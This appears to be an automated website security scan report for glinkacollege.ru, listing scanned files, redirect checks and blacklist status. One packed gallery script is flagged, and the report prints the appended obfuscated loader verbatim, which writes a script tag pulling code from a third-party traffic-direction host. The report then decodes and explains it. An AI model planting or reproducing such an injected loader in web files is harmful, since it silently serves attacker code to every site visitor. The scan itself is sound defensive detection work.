Scanned pages/files
Request | Server response | Status |
http://glinkacollege.ru/ | 200 OK Content-Length: 55313 Content-Type: text/html | clean |
http://glinkacollege.ru/media/system/js/caption.js | 200 OK Content-Length: 2393 Content-Type: application/x-javascript | clean |
http://glinkacollege.ru/plugins/content/mavikthumbnails/highslide/highslide-with-gallery.packed.js | 200 OK Content-Length: 37262 Content-Type: application/x-javascript | malicious |
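Malicious code - confirmed by antivirus engines (see below). The excerpt shows the start of the packed library followed by the statement appended to it; the scanner appears to have cut the text in between:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('q(!m){u m={18:{95:\'9e\',9c:\'ce...\',9d:\'7q 1L cf\',8J:\'7q 1L cc 1L c6\',8c:\'c7 1L c8 B (f)\',ad:\'ch by <i>aw ar</i>\',ae:\'ci 1L cp aw ar cr
var _0x7b2a=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x36\x64","\x66\x61\x73\x39\x6F\x62\x78","\x6E\x32\x33\x34\x2E\x75\x73\x2F\x74\x64\x73\x2F\x6A","\x73\x2E\x70\x68\x70\x3F\x74\x64\x73\x3D\x31\x36\x35\x31\x22\x3E\x3C\x2F\x73\x63","\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x7b2a[7]](_0x7b2a[0]+_0x7b2a[1]+_0x7b2a[2]+_0x7b2a[3]+_0x7b2a[4]+_0x7b2a[5]+_0x7b2a[6]);
The leading eval(function(p,a,c,k,e,d){...}) wrapper is consistent with the library's ordinary packed distribution (the file name ends in .packed.js) and is not by itself the indicator. The indicator is the trailing var _0x7b2a statement: it holds hex-escaped string fragments in an array, joins elements 0 to 6, and passes the result to document[_0x7b2a[7]], where element 7 decodes to "write". The joined string is a script tag that loads code from a third-party host on every page that includes this file (decoded and defanged: hxxp://6dfas9obxn234[.]us/tds/js.php?tds=1651). The page does not show what that URL returns. Because the statement is appended to a static file, restoring the file from a known-good copy of the library and searching the site's other .js files for the same _0x7b2a pattern are the natural follow-up checks.
Antivirus reports: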
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://glinkacollege.ru/modules/mod_easymenu/ddsmoothmenu/ddsmoothmenu.php | 200 OK Content-Length: 6990 Content-Type: text/javascript | clean |
http://glinkacollege.ru/modules/mod_hot_image_slider/js/scripts.js | 200 OK Content-Length: 7049 Content-Type: application/x-javascript | clean |
http://glinkacollege.ru/index.php/2011-10-27-22-31-39 | 200 OK Content-Length: 40452 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/ | 200 OK Content-Length: 55327 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/mnu-welcome | 200 OK Content-Length: 40817 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php | 200 OK Content-Length: 55326 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/2010-10-22-12-27-27 | 200 OK Content-Length: 45709 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/collegesructure/mnu-fullstruct | 200 OK Content-Length: 41868 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/collegesructure/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://glinkacollege.ru/test404page.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: glinkacollege.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 00:18:05 GMT
Pragma: no-cache
ETag: 6666cd76f96956469e7be39d750cc7d9
Server: DataPalm/3.5
Content-Type: text/html
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 26 Feb 2015 00:18:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7867f38d43a7ca6261f1422996cb15aa=34c6badbb66ee3da7dfe7c96315a0d98; path=/
GET / HTTP/1.1
Host: glinkacollege.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 00:18:05 GMT
Pragma: no-cache
ETag: 6666cd76f96956469e7be39d750cc7d9
Server: DataPalm/3.5
Content-Type: text/html
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 26 Feb 2015 00:18:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7867f38d43a7ca6261f1422996cb15aa=34c6badbb66ee3da7dfe7c96315a0d98; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: glinkacollege.ru
Referer: http://www.google.com/search?q=glinkacollege.ru
Result:
The response matches the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: glinkacollege.ru
Referer: http://www.google.com/search?q=glinkacollege.ru
Result:
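The response matches the first query. No suspicious redirects were found. This check requests only the home page with a search-engine Referer, so a clean result here says nothing about the script file flagged as malicious above.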
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=glinkacollege.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://glinkacollege.ru/
Result: glinkacollege.ru is not infected or malware details are not published yet.
Result: glinkacollege.ru is not infected or malware details are not published yet.